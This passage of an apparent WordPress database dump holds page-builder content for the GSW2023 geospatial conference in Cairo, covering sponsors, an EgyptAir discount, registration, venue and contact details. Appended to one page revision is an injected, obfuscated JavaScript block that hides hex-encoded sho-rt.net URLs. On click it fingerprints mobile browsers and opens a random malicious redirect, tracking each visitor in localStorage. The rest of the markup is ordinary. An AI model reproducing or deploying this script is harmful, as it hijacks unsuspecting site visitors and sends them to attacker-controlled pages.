src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\r\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n&nbsp;\r\n<h3></h3>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 05:45:01','2023-05-17 05:45:01','',3066,'https://gsw2023.com/?p=4533',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(4534,1,'2023-05-17 05:47:09','2023-05-17 05:47:09','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" 